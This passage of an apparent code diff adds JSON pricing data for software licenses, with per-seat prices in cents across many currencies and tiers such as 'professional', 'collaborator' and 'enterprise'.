"additional_license_legacy_price_in_cents": 8675600 + }, + "50": { + "price_in_cents": 722970000, + "additional_license_legacy_price_in_cents": 7952600 + } + }, + "COP": { + "2": { + "price_in_cents": 94788000, + "additional_license_legacy_price_in_cents": 55293000 
+ }, + "3": { + "price_in_cents": 142182000, + "additional_license_legacy_price_in_cents": 55293000 + }, + "4": { + "price_in_cents": 189576000, + "additional_license_legacy_price_in_cents": 55293000 + }, + "5": { + "price_in_cents": 236970000, + "additional_license_legacy_price_in_cents": 55293000 + }, + "10": { + "price_in_cents": 473940000, + "additional_license_legacy_price_in_cents": 30806100 + }, + "20": { + "price_in_cents": 947880000, + "additional_license_legacy_price_in_cents": 28436400 + }, + "50": { + "price_in_cents": 2000000000, + "additional_license_legacy_price_in_cents": 26066700 + } + }, + "DKK": { + "2": { + "price_in_cents": 285400, + "additional_license_legacy_price_in_cents": 166500 + }, + "3": { + "price_in_cents": 428100, + "additional_license_legacy_price_in_cents": 166500 + }, + "4": { + "price_in_cents": 570800, + "additional_license_legacy_price_in_cents": 166500 + }, + "5": { + "price_in_cents": 713500, + "additional_license_legacy_price_in_cents": 166500 + }, + "10": { + "price_in_cents": 1427000, + "additional_license_legacy_price_in_cents": 92700 + }, + "20": { + "price_in_cents": 2854000, + "additional_license_legacy_price_in_cents": 85600 + }, + "50": { + "price_in_cents": 7135000, + "additional_license_legacy_price_in_cents": 78500 + } + }, + "EUR": { + "2": { + "price_in_cents": 44200, + "additional_license_legacy_price_in_cents": 25800 + }, + "3": { + "price_in_cents": 66300, + "additional_license_legacy_price_in_cents": 25800 + }, + "4": { + "price_in_cents": 88400, + "additional_license_legacy_price_in_cents": 25800 + }, + "5": { + "price_in_cents": 110500, + "additional_license_legacy_price_in_cents": 25800 + }, + "10": { + "price_in_cents": 221000, + "additional_license_legacy_price_in_cents": 14300 + }, + "20": { + "price_in_cents": 442000, + "additional_license_legacy_price_in_cents": 13200 + }, + "50": { + "price_in_cents": 1105000, + "additional_license_legacy_price_in_cents": 12100 + } + }, + "GBP": { + "2": { + "price_in_cents": 38200, + "additional_license_legacy_price_in_cents": 22300 + }, + "3": { + "price_in_cents": 57300, + "additional_license_legacy_price_in_cents": 22300 + }, + "4": { + "price_in_cents": 76400, + "additional_license_legacy_price_in_cents": 22300 + }, + "5": { + "price_in_cents": 95500, + "additional_license_legacy_price_in_cents": 22300 + }, + "10": { + "price_in_cents": 191000, + "additional_license_legacy_price_in_cents": 12400 + }, + "20": { + "price_in_cents": 382000, + "additional_license_legacy_price_in_cents": 11400 + }, + "50": { + "price_in_cents": 955000, + "additional_license_legacy_price_in_cents": 10500 + } + }, + "INR": { + "2": { + "price_in_cents": 1151800, + "additional_license_legacy_price_in_cents": 671900 + }, + "3": { + "price_in_cents": 1727700, + "additional_license_legacy_price_in_cents": 671900 + }, + "4": { + "price_in_cents": 2303600, + "additional_license_legacy_price_in_cents": 671900 + }, + "5": { + "price_in_cents": 2879500, + "additional_license_legacy_price_in_cents": 671900 + }, + "10": { + "price_in_cents": 5759000, + "additional_license_legacy_price_in_cents": 374300 + }, + "20": { + "price_in_cents": 11518000, + "additional_license_legacy_price_in_cents": 345500 + }, + "50": { + "price_in_cents": 28795000, + "additional_license_legacy_price_in_cents": 316700 + } + }, + "MXN": { + "2": { + "price_in_cents": 707800, + "additional_license_legacy_price_in_cents": 412900 + }, + "3": { + "price_in_cents": 1061700, + "additional_license_legacy_price_in_cents": 412900 + }, + "4": { + 
"price_in_cents": 1415600, + "additional_license_legacy_price_in_cents": 412900 + }, + "5": { + "price_in_cents": 1769500, + "additional_license_legacy_price_in_cents": 412900 + }, + "10": { + "price_in_cents": 3539000, + "additional_license_legacy_price_in_cents": 230000 + }, + "20": { + "price_in_cents": 7078000, + "additional_license_legacy_price_in_cents": 212300 + }, + "50": { + "price_in_cents": 17695000, + "additional_license_legacy_price_in_cents": 194600 + } + }, + "NOK": { + "2": { + "price_in_cents": 344200, + "additional_license_legacy_price_in_cents": 200800 + }, + "3": { + "price_in_cents": 516300, + "additional_license_legacy_price_in_cents": 200800 + }, + "4": { + "price_in_cents": 688400, + "additional_license_legacy_price_in_cents": 200800 + }, + "5": { + "price_in_cents": 860500, + "additional_license_legacy_price_in_cents": 200800 + }, + "10": { + "price_in_cents": 1721000, + "additional_license_legacy_price_in_cents": 111800 + }, + "20": { + "price_in_cents": 3442000, + "additional_license_legacy_price_in_cents": 103200 + }, + "50": { + "price_in_cents": 8605000, + "additional_license_legacy_price_in_cents": 94600 + } + }, + "NZD": { + "2": { + "price_in_cents": 55000, + "additional_license_legacy_price_in_cents": 32100 + }, + "3": { + "price_in_cents": 82500, + "additional_license_legacy_price_in_cents": 32100 + }, + "4": { + "price_in_cents": 110000, + "additional_license_legacy_price_in_cents": 32100 + }, + "5": { + "price_in_cents": 137500, + "additional_license_legacy_price_in_cents": 32100 + }, + "10": { + "price_in_cents": 275000, + "additional_license_legacy_price_in_cents": 17900 + }, + "20": { + "price_in_cents": 550000, + "additional_license_legacy_price_in_cents": 16500 + }, + "50": { + "price_in_cents": 1375000, + "additional_license_legacy_price_in_cents": 15100 + } + }, + "PEN": { + "2": { + "price_in_cents": 115000, + "additional_license_legacy_price_in_cents": 67100 + }, + "3": { + "price_in_cents": 172500, + "additional_license_legacy_price_in_cents": 67100 + }, + "4": { + "price_in_cents": 230000, + "additional_license_legacy_price_in_cents": 67100 + }, + "5": { + "price_in_cents": 287500, + "additional_license_legacy_price_in_cents": 67100 + }, + "10": { + "price_in_cents": 575000, + "additional_license_legacy_price_in_cents": 37400 + }, + "20": { + "price_in_cents": 1150000, + "additional_license_legacy_price_in_cents": 34500 + }, + "50": { + "price_in_cents": 2875000, + "additional_license_legacy_price_in_cents": 31600 + } + }, + "SEK": { + "2": { + "price_in_cents": 344200, + "additional_license_legacy_price_in_cents": 200800 + }, + "3": { + "price_in_cents": 516300, + "additional_license_legacy_price_in_cents": 200800 + }, + "4": { + "price_in_cents": 688400, + "additional_license_legacy_price_in_cents": 200800 + }, + "5": { + "price_in_cents": 860500, + "additional_license_legacy_price_in_cents": 200800 + }, + "10": { + "price_in_cents": 1721000, + "additional_license_legacy_price_in_cents": 111800 + }, + "20": { + "price_in_cents": 3442000, + "additional_license_legacy_price_in_cents": 103200 + }, + "50": { + "price_in_cents": 8605000, + "additional_license_legacy_price_in_cents": 94600 + } + }, + "SGD": { + "2": { + "price_in_cents": 62200, + "additional_license_legacy_price_in_cents": 36300 + }, + "3": { + "price_in_cents": 93300, + "additional_license_legacy_price_in_cents": 36300 + }, + "4": { + "price_in_cents": 124400, + "additional_license_legacy_price_in_cents": 36300 + }, + "5": { + "price_in_cents": 155500, + 
"additional_license_legacy_price_in_cents": 36300 + }, + "10": { + "price_in_cents": 311000, + "additional_license_legacy_price_in_cents": 20200 + }, + "20": { + "price_in_cents": 622000, + "additional_license_legacy_price_in_cents": 18600 + }, + "50": { + "price_in_cents": 1555000, + "additional_license_legacy_price_in_cents": 17100 + } + }, + "USD": { + "2": { + "price_in_cents": 47800, + "additional_license_legacy_price_in_cents": 27900 + }, + "3": { + "price_in_cents": 71700, + "additional_license_legacy_price_in_cents": 27900 + }, + "4": { + "price_in_cents": 95600, + "additional_license_legacy_price_in_cents": 27900 + }, + "5": { + "price_in_cents": 119500, + "additional_license_legacy_price_in_cents": 27900 + }, + "10": { + "price_in_cents": 239000, + "additional_license_legacy_price_in_cents": 15500 + }, + "20": { + "price_in_cents": 478000, + "additional_license_legacy_price_in_cents": 14300 + }, + "50": { + "price_in_cents": 1195000, + "additional_license_legacy_price_in_cents": 13100 + } + } + }, + "collaborator": { + "AUD": { + "2": { + "price_in_cents": 28600, + "additional_license_legacy_price_in_cents": 16700 + }, + "3": { + "price_in_cents": 42900, + "additional_license_legacy_price_in_cents": 16700 + }, + "4": { + "price_in_cents": 57200, + "additional_license_legacy_price_in_cents": 16700 + }, + "5": { + "price_in_cents": 71500, + "additional_license_legacy_price_in_cents": 16700 + }, + "10": { + "price_in_cents": 143000, + "additional_license_legacy_price_in_cents": 9300 + }, + "20": { + "price_in_cents": 286000, + "additional_license_legacy_price_in_cents": 8600 + }, + "50": { + "price_in_cents": 715000, + "additional_license_legacy_price_in_cents": 7800 + } + }, + "BRL": { + "2": { + "price_in_cents": 59800, + "additional_license_legacy_price_in_cents": 34900 + }, + "3": { + "price_in_cents": 89700, + "additional_license_legacy_price_in_cents": 34900 + }, + "4": { + "price_in_cents": 119600, + "additional_license_legacy_price_in_cents": 34900 + }, + "5": { + "price_in_cents": 149500, + "additional_license_legacy_price_in_cents": 34900 + }, + "10": { + "price_in_cents": 299000, + "additional_license_legacy_price_in_cents": 19400 + }, + "20": { + "price_in_cents": 598000, + "additional_license_legacy_price_in_cents": 17900 + }, + "50": { + "price_in_cents": 1495000, + "additional_license_legacy_price_in_cents": 16400 + } + }, + "CAD": { + "2": { + "price_in_cents": 27400, + "additional_license_legacy_price_in_cents": 16000 + }, + "3": { + "price_in_cents": 41100, + "additional_license_legacy_price_in_cents": 16000 + }, + "4": { + "price_in_cents": 54800, + "additional_license_legacy_price_in_cents": 16000 + }, + "5": { + "price_in_cents": 68500, + "additional_license_legacy_price_in_cents": 16000 + }, + "10": { + "price_in_cents": 137000, + "additional_license_legacy_price_in_cents": 8900 + }, + "20": { + "price_in_cents": 274000, + "additional_license_legacy_price_in_cents": 8200 + }, + "50": { + "price_in_cents": 685000, + "additional_license_legacy_price_in_cents": 7500 + } + }, + "CHF": { + "2": { + "price_in_cents": 23800, + "additional_license_legacy_price_in_cents": 13900 + }, + "3": { + "price_in_cents": 35700, + "additional_license_legacy_price_in_cents": 13900 + }, + "4": { + "price_in_cents": 47600, + "additional_license_legacy_price_in_cents": 13900 + }, + "5": { + "price_in_cents": 59500, + "additional_license_legacy_price_in_cents": 13900 + }, + "10": { + "price_in_cents": 119000, + "additional_license_legacy_price_in_cents": 7700 + }, + "20": { + 
"price_in_cents": 238000, + "additional_license_legacy_price_in_cents": 7100 + }, + "50": { + "price_in_cents": 595000, + "additional_license_legacy_price_in_cents": 6500 + } + }, + "CLP": { + "2": { + "price_in_cents": 13318800, + "additional_license_legacy_price_in_cents": 7769300 + }, + "3": { + "price_in_cents": 19978200, + "additional_license_legacy_price_in_cents": 7769300 + }, + "4": { + "price_in_cents": 26637600, + "additional_license_legacy_price_in_cents": 7769300 + }, + "5": { + "price_in_cents": 33297000, + "additional_license_legacy_price_in_cents": 7769300 + }, + "10": { + "price_in_cents": 66594000, + "additional_license_legacy_price_in_cents": 4328600 + }, + "20": { + "price_in_cents": 133188000, + "additional_license_legacy_price_in_cents": 3995600 + }, + "50": { + "price_in_cents": 332970000, + "additional_license_legacy_price_in_cents": 3662600 + } + }, + "COP": { + "2": { + "price_in_cents": 46788000, + "additional_license_legacy_price_in_cents": 27293000 + }, + "3": { + "price_in_cents": 70182000, + "additional_license_legacy_price_in_cents": 27293000 + }, + "4": { + "price_in_cents": 93576000, + "additional_license_legacy_price_in_cents": 27293000 + }, + "5": { + "price_in_cents": 116970000, + "additional_license_legacy_price_in_cents": 27293000 + }, + "10": { + "price_in_cents": 233940000, + "additional_license_legacy_price_in_cents": 15206100 + }, + "20": { + "price_in_cents": 467880000, + "additional_license_legacy_price_in_cents": 14036400 + }, + "50": { + "price_in_cents": 1169700000, + "additional_license_legacy_price_in_cents": 12866700 + } + }, + "DKK": { + "2": { + "price_in_cents": 143800, + "additional_license_legacy_price_in_cents": 83900 + }, + "3": { + "price_in_cents": 215700, + "additional_license_legacy_price_in_cents": 83900 + }, + "4": { + "price_in_cents": 287600, + "additional_license_legacy_price_in_cents": 83900 + }, + "5": { + "price_in_cents": 359500, + "additional_license_legacy_price_in_cents": 83900 + }, + "10": { + "price_in_cents": 719000, + "additional_license_legacy_price_in_cents": 46700 + }, + "20": { + "price_in_cents": 1438000, + "additional_license_legacy_price_in_cents": 43100 + }, + "50": { + "price_in_cents": 3595000, + "additional_license_legacy_price_in_cents": 39500 + } + }, + "EUR": { + "2": { + "price_in_cents": 21400, + "additional_license_legacy_price_in_cents": 12500 + }, + "3": { + "price_in_cents": 32100, + "additional_license_legacy_price_in_cents": 12500 + }, + "4": { + "price_in_cents": 42800, + "additional_license_legacy_price_in_cents": 12500 + }, + "5": { + "price_in_cents": 53500, + "additional_license_legacy_price_in_cents": 12500 + }, + "10": { + "price_in_cents": 107000, + "additional_license_legacy_price_in_cents": 6900 + }, + "20": { + "price_in_cents": 214000, + "additional_license_legacy_price_in_cents": 6400 + }, + "50": { + "price_in_cents": 535000, + "additional_license_legacy_price_in_cents": 5900 + } + }, + "GBP": { + "2": { + "price_in_cents": 19000, + "additional_license_legacy_price_in_cents": 11100 + }, + "3": { + "price_in_cents": 28500, + "additional_license_legacy_price_in_cents": 11100 + }, + "4": { + "price_in_cents": 38000, + "additional_license_legacy_price_in_cents": 11100 + }, + "5": { + "price_in_cents": 47500, + "additional_license_legacy_price_in_cents": 11100 + }, + "10": { + "price_in_cents": 95000, + "additional_license_legacy_price_in_cents": 6200 + }, + "20": { + "price_in_cents": 190000, + "additional_license_legacy_price_in_cents": 5700 + }, + "50": { + "price_in_cents": 
475000, + "additional_license_legacy_price_in_cents": 5200 + } + }, + "INR": { + "2": { + "price_in_cents": 551800, + "additional_license_legacy_price_in_cents": 321900 + }, + "3": { + "price_in_cents": 827700, + "additional_license_legacy_price_in_cents": 321900 + }, + "4": { + "price_in_cents": 1103600, + "additional_license_legacy_price_in_cents": 321900 + }, + "5": { + "price_in_cents": 1379500, + "additional_license_legacy_price_in_cents": 321900 + }, + "10": { + "price_in_cents": 2759000, + "additional_license_legacy_price_in_cents": 179300 + }, + "20": { + "price_in_cents": 5518000, + "additional_license_legacy_price_in_cents": 165500 + }, + "50": { + "price_in_cents": 13795000, + "additional_license_legacy_price_in_cents": 151700 + } + }, + "MXN": { + "2": { + "price_in_cents": 347800, + "additional_license_legacy_price_in_cents": 202900 + }, + "3": { + "price_in_cents": 521700, + "additional_license_legacy_price_in_cents": 202900 + }, + "4": { + "price_in_cents": 695600, + "additional_license_legacy_price_in_cents": 202900 + }, + "5": { + "price_in_cents": 869500, + "additional_license_legacy_price_in_cents": 202900 + }, + "10": { + "price_in_cents": 1739000, + "additional_license_legacy_price_in_cents": 113000 + }, + "20": { + "price_in_cents": 3478000, + "additional_license_legacy_price_in_cents": 104300 + }, + "50": { + "price_in_cents": 8695000, + "additional_license_legacy_price_in_cents": 95600 + } + }, + "NOK": { + "2": { + "price_in_cents": 173800, + "additional_license_legacy_price_in_cents": 101400 + }, + "3": { + "price_in_cents": 260700, + "additional_license_legacy_price_in_cents": 101400 + }, + "4": { + "price_in_cents": 347600, + "additional_license_legacy_price_in_cents": 101400 + }, + "5": { + "price_in_cents": 434500, + "additional_license_legacy_price_in_cents": 101400 + }, + "10": { + "price_in_cents": 869000, + "additional_license_legacy_price_in_cents": 56500 + }, + "20": { + "price_in_cents": 1738000, + "additional_license_legacy_price_in_cents": 52100 + }, + "50": { + "price_in_cents": 4345000, + "additional_license_legacy_price_in_cents": 47800 + } + }, + "NZD": { + "2": { + "price_in_cents": 28600, + "additional_license_legacy_price_in_cents": 16700 + }, + "3": { + "price_in_cents": 42900, + "additional_license_legacy_price_in_cents": 16700 + }, + "4": { + "price_in_cents": 57200, + "additional_license_legacy_price_in_cents": 16700 + }, + "5": { + "price_in_cents": 71500, + "additional_license_legacy_price_in_cents": 16700 + }, + "10": { + "price_in_cents": 143000, + "additional_license_legacy_price_in_cents": 9300 + }, + "20": { + "price_in_cents": 286000, + "additional_license_legacy_price_in_cents": 8600 + }, + "50": { + "price_in_cents": 715000, + "additional_license_legacy_price_in_cents": 7800 + } + }, + "PEN": { + "2": { + "price_in_cents": 55000, + "additional_license_legacy_price_in_cents": 32100 + }, + "3": { + "price_in_cents": 82500, + "additional_license_legacy_price_in_cents": 32100 + }, + "4": { + "price_in_cents": 110000, + "additional_license_legacy_price_in_cents": 32100 + }, + "5": { + "price_in_cents": 137500, + "additional_license_legacy_price_in_cents": 32100 + }, + "10": { + "price_in_cents": 275000, + "additional_license_legacy_price_in_cents": 17900 + }, + "20": { + "price_in_cents": 550000, + "additional_license_legacy_price_in_cents": 16500 + }, + "50": { + "price_in_cents": 1375000, + "additional_license_legacy_price_in_cents": 15100 + } + }, + "SEK": { + "2": { + "price_in_cents": 173800, + 
"additional_license_legacy_price_in_cents": 101400 + }, + "3": { + "price_in_cents": 260700, + "additional_license_legacy_price_in_cents": 101400 + }, + "4": { + "price_in_cents": 347600, + "additional_license_legacy_price_in_cents": 101400 + }, + "5": { + "price_in_cents": 434500, + "additional_license_legacy_price_in_cents": 101400 + }, + "10": { + "price_in_cents": 869000, + "additional_license_legacy_price_in_cents": 56500 + }, + "20": { + "price_in_cents": 1738000, + "additional_license_legacy_price_in_cents": 52100 + }, + "50": { + "price_in_cents": 4345000, + "additional_license_legacy_price_in_cents": 47800 + } + }, + "SGD": { + "2": { + "price_in_cents": 31000, + "additional_license_legacy_price_in_cents": 18100 + }, + "3": { + "price_in_cents": 46500, + "additional_license_legacy_price_in_cents": 18100 + }, + "4": { + "price_in_cents": 62000, + "additional_license_legacy_price_in_cents": 18100 + }, + "5": { + "price_in_cents": 77500, + "additional_license_legacy_price_in_cents": 18100 + }, + "10": { + "price_in_cents": 155000, + "additional_license_legacy_price_in_cents": 10100 + }, + "20": { + "price_in_cents": 310000, + "additional_license_legacy_price_in_cents": 9300 + }, + "50": { + "price_in_cents": 775000, + "additional_license_legacy_price_in_cents": 8500 + } + }, + "USD": { + "2": { + "price_in_cents": 23800, + "additional_license_legacy_price_in_cents": 13900 + }, + "3": { + "price_in_cents": 35700, + "additional_license_legacy_price_in_cents": 13900 + }, + "4": { + "price_in_cents": 47600, + "additional_license_legacy_price_in_cents": 13900 + }, + "5": { + "price_in_cents": 59500, + "additional_license_legacy_price_in_cents": 13900 + }, + "10": { + "price_in_cents": 119000, + "additional_license_legacy_price_in_cents": 7700 + }, + "20": { + "price_in_cents": 238000, + "additional_license_legacy_price_in_cents": 7100 + }, + "50": { + "price_in_cents": 595000, + "additional_license_legacy_price_in_cents": 6500 + } + } + } + }, + "enterprise": { + "professional": { + "AUD": { + "2": { + "price_in_cents": 82600, + "additional_license_legacy_price_in_cents": 32100 + }, + "3": { + "price_in_cents": 123900, + "additional_license_legacy_price_in_cents": 32100 + }, + "4": { + "price_in_cents": 165200, + "additional_license_legacy_price_in_cents": 32100 + }, + "5": { + "price_in_cents": 206500, + "additional_license_legacy_price_in_cents": 32100 + }, + "10": { + "price_in_cents": 413000, + "additional_license_legacy_price_in_cents": 29800 + }, + "20": { + "price_in_cents": 826000, + "additional_license_legacy_price_in_cents": 27500 + }, + "50": { + "price_in_cents": 2065000, + "additional_license_legacy_price_in_cents": 25200 + } + }, + "BRL": { + "2": { + "price_in_cents": 179800, + "additional_license_legacy_price_in_cents": 69900 + }, + "3": { + "price_in_cents": 269700, + "additional_license_legacy_price_in_cents": 69900 + }, + "4": { + "price_in_cents": 359600, + "additional_license_legacy_price_in_cents": 69900 + }, + "5": { + "price_in_cents": 449500, + "additional_license_legacy_price_in_cents": 69900 + }, + "10": { + "price_in_cents": 899000, + "additional_license_legacy_price_in_cents": 64900 + }, + "20": { + "price_in_cents": 1798000, + "additional_license_legacy_price_in_cents": 59900 + }, + "50": { + "price_in_cents": 4495000, + "additional_license_legacy_price_in_cents": 54900 + } + }, + "CAD": { + "2": { + "price_in_cents": 80800, + "additional_license_legacy_price_in_cents": 31400 + }, + "3": { + "price_in_cents": 121200, + 
"additional_license_legacy_price_in_cents": 31400 + }, + "4": { + "price_in_cents": 161600, + "additional_license_legacy_price_in_cents": 31400 + }, + "5": { + "price_in_cents": 202000, + "additional_license_legacy_price_in_cents": 31400 + }, + "10": { + "price_in_cents": 404000, + "additional_license_legacy_price_in_cents": 29100 + }, + "20": { + "price_in_cents": 808000, + "additional_license_legacy_price_in_cents": 26900 + }, + "50": { + "price_in_cents": 2020000, + "additional_license_legacy_price_in_cents": 24600 + } + }, + "CHF": { + "2": { + "price_in_cents": 71800, + "additional_license_legacy_price_in_cents": 49900 + }, + "3": { + "price_in_cents": 107700, + "additional_license_legacy_price_in_cents": 49900 + }, + "4": { + "price_in_cents": 143600, + "additional_license_legacy_price_in_cents": 49900 + }, + "5": { + "price_in_cents": 179500, + "additional_license_legacy_price_in_cents": 49900 + }, + "10": { + "price_in_cents": 359000, + "additional_license_legacy_price_in_cents": 25900 + }, + "20": { + "price_in_cents": 718000, + "additional_license_legacy_price_in_cents": 23900 + }, + "50": { + "price_in_cents": 1795000, + "additional_license_legacy_price_in_cents": 21900 + } + }, + "CLP": { + "2": { + "price_in_cents": 43378200, + "additional_license_legacy_price_in_cents": 16869300 + }, + "3": { + "price_in_cents": 65067300, + "additional_license_legacy_price_in_cents": 16869300 + }, + "4": { + "price_in_cents": 86756400, + "additional_license_legacy_price_in_cents": 16869300 + }, + "5": { + "price_in_cents": 108445500, + "additional_license_legacy_price_in_cents": 16869300 + }, + "10": { + "price_in_cents": 216891000, + "additional_license_legacy_price_in_cents": 15664300 + }, + "20": { + "price_in_cents": 433782000, + "additional_license_legacy_price_in_cents": 14459400 + }, + "50": { + "price_in_cents": 1084455000, + "additional_license_legacy_price_in_cents": 13254400 + } + }, + "COP": { + "2": { + "price_in_cents": 142182000, + "additional_license_legacy_price_in_cents": 55293000 + }, + "3": { + "price_in_cents": 213273000, + "additional_license_legacy_price_in_cents": 55293000 + }, + "4": { + "price_in_cents": 284364000, + "additional_license_legacy_price_in_cents": 55293000 + }, + "5": { + "price_in_cents": 355455000, + "additional_license_legacy_price_in_cents": 55293000 + }, + "10": { + "price_in_cents": 710910000, + "additional_license_legacy_price_in_cents": 51343500 + }, + "20": { + "price_in_cents": 1421820000, + "additional_license_legacy_price_in_cents": 47394000 + }, + "50": { + "price_in_cents": 2000000000, + "additional_license_legacy_price_in_cents": 40000000 + } + }, + "DKK": { + "2": { + "price_in_cents": 428200, + "additional_license_legacy_price_in_cents": 166500 + }, + "3": { + "price_in_cents": 642300, + "additional_license_legacy_price_in_cents": 166500 + }, + "4": { + "price_in_cents": 856400, + "additional_license_legacy_price_in_cents": 166500 + }, + "5": { + "price_in_cents": 1070500, + "additional_license_legacy_price_in_cents": 166500 + }, + "10": { + "price_in_cents": 2141000, + "additional_license_legacy_price_in_cents": 154600 + }, + "20": { + "price_in_cents": 4282000, + "additional_license_legacy_price_in_cents": 142700 + }, + "50": { + "price_in_cents": 10705000, + "additional_license_legacy_price_in_cents": 130800 + } + }, + "EUR": { + "2": { + "price_in_cents": 66400, + "additional_license_legacy_price_in_cents": 25800 + }, + "3": { + "price_in_cents": 99600, + "additional_license_legacy_price_in_cents": 25800 + }, + "4": { + 
"price_in_cents": 132800, + "additional_license_legacy_price_in_cents": 25800 + }, + "5": { + "price_in_cents": 166000, + "additional_license_legacy_price_in_cents": 25800 + }, + "10": { + "price_in_cents": 332000, + "additional_license_legacy_price_in_cents": 23900 + }, + "20": { + "price_in_cents": 664000, + "additional_license_legacy_price_in_cents": 22100 + }, + "50": { + "price_in_cents": 1660000, + "additional_license_legacy_price_in_cents": 20200 + } + }, + "GBP": { + "2": { + "price_in_cents": 57400, + "additional_license_legacy_price_in_cents": 22300 + }, + "3": { + "price_in_cents": 86100, + "additional_license_legacy_price_in_cents": 22300 + }, + "4": { + "price_in_cents": 114800, + "additional_license_legacy_price_in_cents": 22300 + }, + "5": { + "price_in_cents": 143500, + "additional_license_legacy_price_in_cents": 22300 + }, + "10": { + "price_in_cents": 287000, + "additional_license_legacy_price_in_cents": 20700 + }, + "20": { + "price_in_cents": 574000, + "additional_license_legacy_price_in_cents": 19100 + }, + "50": { + "price_in_cents": 1435000, + "additional_license_legacy_price_in_cents": 17500 + } + }, + "INR": { + "2": { + "price_in_cents": 1727800, + "additional_license_legacy_price_in_cents": 671900 + }, + "3": { + "price_in_cents": 2591700, + "additional_license_legacy_price_in_cents": 671900 + }, + "4": { + "price_in_cents": 3455600, + "additional_license_legacy_price_in_cents": 671900 + }, + "5": { + "price_in_cents": 4319500, + "additional_license_legacy_price_in_cents": 671900 + }, + "10": { + "price_in_cents": 8639000, + "additional_license_legacy_price_in_cents": 623900 + }, + "20": { + "price_in_cents": 17278000, + "additional_license_legacy_price_in_cents": 575900 + }, + "50": { + "price_in_cents": 43195000, + "additional_license_legacy_price_in_cents": 527900 + } + }, + "MXN": { + "2": { + "price_in_cents": 1061800, + "additional_license_legacy_price_in_cents": 412900 + }, + "3": { + "price_in_cents": 1592700, + "additional_license_legacy_price_in_cents": 412900 + }, + "4": { + "price_in_cents": 2123600, + "additional_license_legacy_price_in_cents": 412900 + }, + "5": { + "price_in_cents": 2654500, + "additional_license_legacy_price_in_cents": 412900 + }, + "10": { + "price_in_cents": 5309000, + "additional_license_legacy_price_in_cents": 383400 + }, + "20": { + "price_in_cents": 10618000, + "additional_license_legacy_price_in_cents": 353900 + }, + "50": { + "price_in_cents": 26545000, + "additional_license_legacy_price_in_cents": 324400 + } + }, + "NOK": { + "2": { + "price_in_cents": 516400, + "additional_license_legacy_price_in_cents": 200800 + }, + "3": { + "price_in_cents": 774600, + "additional_license_legacy_price_in_cents": 200800 + }, + "4": { + "price_in_cents": 1032800, + "additional_license_legacy_price_in_cents": 200800 + }, + "5": { + "price_in_cents": 1291000, + "additional_license_legacy_price_in_cents": 200800 + }, + "10": { + "price_in_cents": 2582000, + "additional_license_legacy_price_in_cents": 186400 + }, + "20": { + "price_in_cents": 5164000, + "additional_license_legacy_price_in_cents": 172100 + }, + "50": { + "price_in_cents": 12910000, + "additional_license_legacy_price_in_cents": 157700 + } + }, + "NZD": { + "2": { + "price_in_cents": 82600, + "additional_license_legacy_price_in_cents": 32100 + }, + "3": { + "price_in_cents": 123900, + "additional_license_legacy_price_in_cents": 32100 + }, + "4": { + "price_in_cents": 165200, + "additional_license_legacy_price_in_cents": 32100 + }, + "5": { + "price_in_cents": 206500, + 
"additional_license_legacy_price_in_cents": 32100 + }, + "10": { + "price_in_cents": 413000, + "additional_license_legacy_price_in_cents": 29800 + }, + "20": { + "price_in_cents": 826000, + "additional_license_legacy_price_in_cents": 27500 + }, + "50": { + "price_in_cents": 2065000, + "additional_license_legacy_price_in_cents": 25200 + } + }, + "PEN": { + "2": { + "price_in_cents": 172600, + "additional_license_legacy_price_in_cents": 67100 + }, + "3": { + "price_in_cents": 258900, + "additional_license_legacy_price_in_cents": 67100 + }, + "4": { + "price_in_cents": 345200, + "additional_license_legacy_price_in_cents": 67100 + }, + "5": { + "price_in_cents": 431500, + "additional_license_legacy_price_in_cents": 67100 + }, + "10": { + "price_in_cents": 863000, + "additional_license_legacy_price_in_cents": 62300 + }, + "20": { + "price_in_cents": 1726000, + "additional_license_legacy_price_in_cents": 57500 + }, + "50": { + "price_in_cents": 4315000, + "additional_license_legacy_price_in_cents": 52700 + } + }, + "SEK": { + "2": { + "price_in_cents": 516400, + "additional_license_legacy_price_in_cents": 200800 + }, + "3": { + "price_in_cents": 774600, + "additional_license_legacy_price_in_cents": 200800 + }, + "4": { + "price_in_cents": 1032800, + "additional_license_legacy_price_in_cents": 200800 + }, + "5": { + "price_in_cents": 1291000, + "additional_license_legacy_price_in_cents": 200800 + }, + "10": { + "price_in_cents": 2582000, + "additional_license_legacy_price_in_cents": 186400 + }, + "20": { + "price_in_cents": 5164000, + "additional_license_legacy_price_in_cents": 172100 + }, + "50": { + "price_in_cents": 12910000, + "additional_license_legacy_price_in_cents": 157700 + } + }, + "SGD": { + "2": { + "price_in_cents": 93400, + "additional_license_legacy_price_in_cents": 36300 + }, + "3": { + "price_in_cents": 140100, + "additional_license_legacy_price_in_cents": 36300 + }, + "4": { + "price_in_cents": 186800, + "additional_license_legacy_price_in_cents": 36300 + }, + "5": { + "price_in_cents": 233500, + "additional_license_legacy_price_in_cents": 36300 + }, + "10": { + "price_in_cents": 467000, + "additional_license_legacy_price_in_cents": 33700 + }, + "20": { + "price_in_cents": 934000, + "additional_license_legacy_price_in_cents": 31100 + }, + "50": { + "price_in_cents": 2335000, + "additional_license_legacy_price_in_cents": 28500 + } + }, + "USD": { + "2": { + "price_in_cents": 71800, + "additional_license_legacy_price_in_cents": 27900 + }, + "3": { + "price_in_cents": 107700, + "additional_license_legacy_price_in_cents": 27900 + }, + "4": { + "price_in_cents": 143600, + "additional_license_legacy_price_in_cents": 27900 + }, + "5": { + "price_in_cents": 179500, + "additional_license_legacy_price_in_cents": 27900 + }, + "10": { + "price_in_cents": 359000, + "additional_license_legacy_price_in_cents": 25900 + }, + "20": { + "price_in_cents": 718000, + "additional_license_legacy_price_in_cents": 23900 + }, + "50": { + "price_in_cents": 1795000, + "additional_license_legacy_price_in_cents": 21900 + } + } + }, + "collaborator": { + "AUD": { + "2": { + "price_in_cents": 43000, + "additional_license_legacy_price_in_cents": 16700 + }, + "3": { + "price_in_cents": 64500, + "additional_license_legacy_price_in_cents": 16700 + }, + "4": { + "price_in_cents": 86000, + "additional_license_legacy_price_in_cents": 16700 + }, + "5": { + "price_in_cents": 107500, + "additional_license_legacy_price_in_cents": 16700 + }, + "10": { + "price_in_cents": 215000, + 
